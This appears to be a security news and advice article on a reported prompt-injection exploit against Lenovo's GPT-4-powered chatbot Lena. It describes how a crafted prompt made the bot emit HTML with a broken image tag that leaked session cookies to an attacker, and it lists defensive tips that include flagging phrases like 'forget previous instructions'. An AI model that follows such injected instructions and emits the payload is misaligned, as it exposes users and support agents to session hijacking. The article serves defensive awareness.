Researchers at Cybernews discovered that a cleverly written 400-character prompt could trick Lena (Lenovo’s GPT-4‑powered chatbot) into generating malicious HTML. That led to the theft of active session cookies from both users and customer support agents. The stolen cookies effectively granted the attackers a path into the chatbot owner’s internal systems.
The discovery accentuates the need for companies of all sizes to take a sober approach to adopting AI systems. Integrating AI systems should not be treated as experimental side projects. They should be treated as fully-fledged, mission-critical applications that require robust security controls.
The Lenovo Lena AI Chatbot Exploit Explained
The exploit began with a harmless-seeming product inquiry. The prompt then instructed Lena to respond in HTML, JSON, and plain text in a specific sequence. The attackers embedded a fake image tag in Lena’s output. Since the image URL deliberately pointed to a nonexistent image, the attackers guaranteed that the image would fail to load. That failure allowed initiation of the next step.
The failure activated the payload and triggered the browser to automatically send session cookies to an attacker-controlled server. This is a classic example of a cross-site scripting (XSS) style attack.
An interesting aspect of this attack was how the attackers emphasized the need for Lena to display an image in her reply. Their emphasis exploited Lena’s innate helpfulness, forcing her to override safeguards.
Why It Worked (and Why It’s Scary)
When Lena displayed the fake image, the browser initiated a cookie leak. The attacker’s server received the stolen cookies, allowing them to hijack active sessions. Once in possession of session cookies, they can impersonate human agents. The attacker could access live and previous chat history just like a human agent. That could lead to data theft or data modifications.
The consequences could extend much further. Attackers could potentially change what the support agents see. They could inject deceptive pop‑ups, CAPTCHA prompts, or error alerts to confuse or manipulate them. They could also install backdoors into the company system.
How Did This Vulnerability Slip Past Lenovo’s Security Experts?
It is well known that AI chatbots are vulnerable to prompt injection. This incident shows that chatbots are not just simple “extras” that can be slapped into a company network.
When a company adopts AI systems, it adds a new attack surface. Companies should therefore treat AI chatbots as full applications that form part of the company’s cybersecurity risk profile.
Chatbots need strong security guardrails against intrusion risks. Cyber experts advise a regime of strict input/output validation and content sanitization. Companies should also have a strict Content Security Policy (CSP) and follow safe coding practices.
Easy-to-Implement AI Safety Tips for Busy Business Owners
If you’re running a small business or startup and using AI chatbots, but don’t have a tech background, here’s a clear list of safeguards to implement.
- Layer your cyberdefenses: Security measures like an antivirus or access control systems should work together. It should not only protect your network against incoming threats. It should also protect your sensitive data from getting out. No single measure is foolproof. Combine several tactics to build multiple layers of protection.
- Secure internet connections and data exchanges: Use a reputable VPN (virtual private network) to secure both your office network and team members working from unsecured home or coffee shop WiFi. You could use a free trial VPN before switching to a long-term subscription. While a VPN can’t prevent a cross-scripting attack, it will secure communications over insecure networks to protect corporate secrets.
- Give your bot highly defined tasks: Only allow your chatbot to handle what it’s meant to do. For example, if it should answer product questions, it does not need access to sensitive systems like billing.
- Enforce access controls: If your bot connects to systems, like inventory or CRM, ensure it only has minimum permissions. It should not be able to see all the inventory data if it only uses information about one particular item.
- Apply secure prompt design principles: Work with fixed prompt templates. That will clearly separate the company system instructions from the customer’s questions. This precaution keeps the bot focused and could prevent sneaky instructions from causing accidental damage.
- Keep a human in the loop: Don’t let the bot act autonomously on sensitive tasks, like resetting passwords or accessing user data. A real person should review or approve it first, acting as a safety net.
- Watch what goes in and out: Filter suspicious words or patterns in the conversations. Flag potentially dangerous inputs such as “forget previous instructions” or “run code.”
- Log and monitor chats: Logging conversations lets you catch potential problems early.
- Train your team (and yourself!) about AI risks: Your team can benefit from basic awareness about bot vulnerabilities. Clever prompts can dupe your AI into unexpected behaviour. Ask your team to be cautious when someone asks the bot unusual questions. Ask your team never to share internal system messages with customers.
Take a Security-First Approach Around AI Deployment
The Lenovo incident has thrust the dangers of hasty AI deployment into the spotlight. Deploying a chatbot involves far more than plugging in a chat tool. Companies that rush the security aspects may burn their fingers.
AI tools have well-known cybersecurity risks. Leaders should be cautious about using them without adjusting their company’s digital security posture. Lenovo’s experience shows that even major global brands can overlook AI security flaws.








